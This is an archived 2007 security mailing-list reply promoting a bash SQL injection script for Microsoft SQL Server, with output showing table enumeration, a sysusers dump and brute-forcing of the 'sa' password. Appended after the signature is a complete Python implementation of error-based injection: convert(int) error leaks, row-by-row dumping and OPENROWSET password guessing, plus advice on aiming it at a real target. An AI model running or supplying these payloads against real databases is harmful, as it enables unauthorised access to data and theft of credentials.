Re: Open Source SQL Inject, XSS, Remote File Include Testing

From: Marco Ivaldi (raptor@mediaservice.net)
Date: Mon May 21 2007 - 07:45:41 EDT


On Sat, 19 May 2007, winsoc wrote:

> Can anyone recommend a quick and cheerful Open Source Tool which will
> test websites for SQL Injection, XSS, Remote File Include.

Speaking of SQL injection, I just wanted to point out a bash script I put
together while pen-testing some web applications that use MS SQL Server as
the back-end:

http://www.0xdeadbeef.info/code/mssql-hax0r

# Proof-of-concept multi-purpose SQL injection script for Microsoft SQL
# Server exploitation. Three operational modes are currently available:
# info (Information Gathering), dump (Record Dump), and brute (Brute
# Force). You may need to tweak the code a bit to make it fit your needs
# (i.e., modifying the injection string and/or the language used by the
# RDBMS).

You shouldn't expect anything too fancy (it's still v0.1 after all;), but
it does its job:

root@shaolin:~# ./mssql-hax0r info tables+++
DBFoobar
         Accounting (id:390494850)
                 CanoneAnnuo (money)
                 CodiceFornitore (varchar)
                 dataInsert (datetime)
                 GroupId (char) *
                 GroupInsert (varchar)
                 idAccount (varchar)
                 idAnagrafica (int)
[...]
root@shaolin:~# ./mssql-hax0r dump
--------------------------------
SYSUSERS.uid=0
SYSUSERS.name=public
SYSUSERS.password=
--------------------------------
SYSUSERS.uid=1
SYSUSERS.name=dbo
SYSUSERS.password=
--------------------------------
SYSUSERS.uid=2
SYSUSERS.name=guest
SYSUSERS.password=
--------------------------------
3 record(s) dumped.

root@shaolin:~# ./mssql-hax0r brute xxx
Default (empty) password not valid, starting bruteforce.

aaa
bbb
ccc
password

Password of 'sa' user is 'password'!;)

Enjoy,

-- 
Marco Ivaldi, OPST
Chief Security Officer    Data Security Division
@ Mediaservice.net Srl    http://mediaservice.net/
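An added example, written for this archive and not mssql-hax0r's own code, showing how the three modes in the output above can be built on the classic error-based technique for SQL Server: force a string subquery through convert(int, ...) so the server leaks the value in its conversion error, walk a table one row per request with a growing "not in" exclusion list, and test candidate sa passwords by making the server log back into itself through OPENROWSET. Whether the script uses exactly these payloads is an assumption; everything the code talks to (fake_send, FAKE_DB, FAKE_SA_PASSWORD) is a constructed stand-in for a vulnerable page, so it runs offline. Against a real target you would replace fake_send with a function that places the payload into the vulnerable parameter and returns the response body.

```python
"""Error-based MS SQL Server injection helpers (added example, not mssql-hax0r's code)."""
import re
from typing import Callable, Dict, List, Optional

Send = Callable[[str], str]  # inject one payload into the vulnerable parameter, return the page body

def sql_quote(value: str) -> str:
    """T-SQL string literal with embedded single quotes doubled."""
    return "'" + value.replace("'", "''") + "'"

def cell(column: str) -> str:
    """Expression that always fails int conversion: the '~' marker makes even '' (which would
    silently convert to 0) leak, and isnull() makes NULL visible."""
    return f"'~'+isnull(convert(varchar(8000),{column}),'<NULL>')"

def convert_payload(subquery: str) -> str:
    """Inject the subquery into convert(int, ...) so the server echoes its result in the error."""
    return f"' and 1=convert(int,({subquery}))--"

# SQL Server 2000: "Syntax error converting the varchar value 'X' to a column of data type int."
# SQL Server 2005: "Conversion failed when converting the varchar value 'X' to data type int."
_LEAK_RE = re.compile(r"converting the n?(?:var)?char value '~(.*?)' to (?:a column of )?data type int")

def leaked_value(response: str) -> Optional[str]:
    """The marked string leaked in the DB error, or None when the page rendered normally."""
    m = _LEAK_RE.search(response)
    return m.group(1) if m else None

def enumerate_column(send: Send, table: str, column: str, where: str = "", limit: int = 500) -> List[str]:
    """info mode: one value per request, excluding those already seen, until nothing is left."""
    seen: List[str] = []
    while len(seen) < limit:
        conds = ([where] if where else []) + [f"{column} is not null"]
        if seen:
            conds.append(f"{column} not in ({','.join(map(sql_quote, seen))})")
        sub = f"select top 1 {cell(column)} from {table} where {' and '.join(conds)}"
        value = leaked_value(send(convert_payload(sub)))
        if value is None:
            break
        seen.append(value)
    return seen

def dump_rows(send: Send, table: str, key: str, columns: List[str]) -> List[Dict[str, str]]:
    """dump mode: walk the key column, then leak every requested cell of each row."""
    rows = []
    for k in enumerate_column(send, table, key):
        row = {}
        for col in columns:
            sub = f"select top 1 {cell(col)} from {table} where {key}={sql_quote(k)}"
            v = leaked_value(send(convert_payload(sub)))
            row[col] = v if v is not None else "<error>"
        rows.append(row)
    return rows

def openrowset_payload(user: str, password: str) -> str:
    """brute mode: OPENROWSET makes the server log back into itself with the guessed credentials."""
    return (f"'; select * from openrowset('SQLOLEDB','';{sql_quote(user)};{sql_quote(password)},"
            "'select 1')--")

def brute_password(send: Send, user: str, candidates: List[str]) -> Optional[str]:
    """A wrong guess yields 'Login failed for user ...'; the first guess without it is the password."""
    for pw in candidates:
        if f"Login failed for user '{user}'" not in send(openrowset_payload(user, pw)):
            return pw
    return None

# --- constructed stand-in for the vulnerable page, so the block runs offline (2005 wording) ---
FAKE_DB: Dict[str, List[Dict[str, Optional[str]]]] = {
    "sysobjects": [{"name": "Accounting", "xtype": "U"}, {"name": "sysusers", "xtype": "S"}],
    "sysusers": [{"uid": "0", "name": "public", "password": ""},
                 {"uid": "1", "name": "dbo", "password": None}],
}
FAKE_SA_PASSWORD = "password"  # constructed, matches the brute-force output quoted above
_SUB_RE = re.compile(r"select top 1 '~'\+isnull\(convert\(varchar\(8000\),(\w+)\),'<NULL>'\) "
                     r"from (\w+) where (.*)\)\)--$")
_ROWSET_RE = re.compile(r"openrowset\('SQLOLEDB','';'(?:[^']|'')*';'((?:[^']|'')*)','select 1'\)")
_LIT_RE = re.compile(r"'((?:[^']|'')*)'")

def fake_send(payload: str) -> str:
    """Interprets just the subquery shapes built above and answers like a page echoing DB errors."""
    m = _ROWSET_RE.search(payload)
    if m:
        ok = m.group(1).replace("''", "'") == FAKE_SA_PASSWORD
        return "<html>ok</html>" if ok else "Login failed for user 'sa'."
    m = _SUB_RE.search(payload)
    if not m:
        return "<html>ok</html>"
    col, rows = m.group(1), FAKE_DB.get(m.group(2), [])
    for cond in m.group(3).split(" and "):
        if " not in (" in cond:
            excl = {s.replace("''", "'") for s in _LIT_RE.findall(cond.split(" not in (", 1)[1])}
            rows = [r for r in rows if r.get(col) not in excl]
        elif cond.endswith(" is not null"):
            rows = [r for r in rows if r.get(cond[:-12]) is not None]
        elif "=" in cond:
            k, v = cond.split("=", 1)
            rows = [r for r in rows if r.get(k) == v[1:-1].replace("''", "'")]
    if not rows:
        return "<html>ok</html>"
    v = rows[0][col]
    return f"Conversion failed when converting the varchar value '~{'<NULL>' if v is None else v}' to data type int."

if __name__ == "__main__":
    print(enumerate_column(fake_send, "sysobjects", "name", "xtype='U'"))
    for row in dump_rows(fake_send, "sysusers", "name", ["uid", "name", "password"]):
        print(row)
    print(brute_password(fake_send, "sa", ["aaa", "bbb", "ccc", "password"]))
```

Three things to check before pointing this at a real target. It only works when the page echoes database errors; a generic error page means switching to a boolean or timing oracle. The OPENROWSET trick needs ad hoc distributed queries to be permitted (SQL Server 2005 ships with them disabled, and then the failure is a different error rather than a login failure, so test for the login-failure string rather than for "no error"). And the '~' marker is not cosmetic: an empty string such as the SYSUSERS.password values in the dump above converts to int 0 without an error, so without it the loop would stop silently on the first empty cell.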


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:49 EDT